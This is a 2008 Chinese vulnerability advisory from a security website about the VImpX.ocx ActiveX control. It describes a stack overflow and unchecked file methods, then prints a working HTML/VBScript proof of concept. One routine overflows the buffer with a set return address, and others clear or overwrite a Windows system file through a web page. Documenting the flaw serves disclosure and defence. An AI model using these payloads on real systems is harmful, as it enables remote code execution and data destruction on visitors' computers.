首页    新闻    下载    文档    论坛     最新漏洞    黑客教程    数据库    搜索    小榕软件实验室怀旧版    星际争霸WEB版    最新IP准确查询   
名称: 密码:      忘记密码  马上注册
漏洞公告 :: 最新漏洞公告

VImpX.ocx ActiveX控件多个文件破坏漏洞


http://www.gipsky.com/
VImpX.ocx ActiveX控件多个文件破坏漏洞

发布日期:2008-10-24

更新日期:2008-10-27



受影响系统:



DB Software Laboratory VImpX 4.8.8.0

DB Software Laboratory VImpX 4.7.3.0



描述:BUGTRAQ ID: 31907



VImpX ActiveX控件允许跨表格或ODBC数据源将数据导入到Oracle、SQL Server或ODBC数据库中。







VImpX.ocx ActiveX控件(VImpX.ocx,CLSID 7600707B-9F47-416D-8AB5-6FD96EA37968)中存在多个文件破坏漏洞。如果传送了超过256字节的超长字符串的话,就可能触发栈溢出;LogFile()方式没有检查用户提供的参数,可以使用这个函数储存想要清除的文件名,然后使用ClearLogFile()删除文件内容;SaveToFile()方式没有检查用户提供的参数,可以用于覆盖参数中所传送文件名的内容。



<*来源:shinnai (shinnai@autistici.org

*>



测试方法:<font color='#FF0000'><p align='center'>警 告



以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!</p></font><object classid=%26#39;clsid:7600707B-9F47-416D-8AB5-6FD96EA37968%26#39; id=%26#39;test%26#39; width=%26#39;20%26#39; height=%26#39;20%26#39;></object>







<input language=VBScript onclick=bof() type=button value=%26#39;Click here to start the Remote Buffer Overflow test%26#39; style="width: 361px; height: 24px" size=21>







<input language=VBScript onclick=afd() type=button value=%26#39;Click here to start the File Content Deletion test%26#39; style="width: 361px; height: 24px" size=21>







<input language=VBScript onclick=afc() type=button value=%26#39;Click here to start the File Content Corruption test%26#39; style="width: 361px; height: 24px" size=21>











<script language=%26#39;vbscript%26#39;>



Sub bof



buff = String(256,"A")



EDI = unescape("BBBB")



ESI = unescape("CCCC")



EBX = unescape("DDDD")



EIP = unescape("%C6%91%3A%7E") %26#39;unescape("EEEE")



buf2 = unescape("FFFFFFFFFFFFFFFFFFFF")



memo = unescape("%00%00%01%00")



rest = unescape("GGGG") + String(2000, "H")



egg = buff + EDI + ESI + EBX + EIP + buf2 + memo + rest



test.LogFile = egg



End Sub







Sub afd



test.LogFile = "C:\WINDOWS\_system.ini"



test.ClearLogFile



MsgBox "Exploit completed..."



End Sub







Sub afc



test.SaveToFile "C:\WINDOWS\_system.ini"



MsgBox "Exploit completed..."



End Sub



</script>



建议:厂商补丁:



DB Software Laboratory

----------------------

目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:







http://www.dbsoftlab.com/e107_plugins ... nt/content.php?content.53
<< KVIrc URI处理器远程格式串处理漏洞 libspf2 DNS TXT记录处理堆溢出漏洞 >>
评分
10987654321
API:
gipsky.com & 安信网络

系统导航

 

Copyright © 2001-2010 安信网络. All Rights Reserved
京ICP备05056747号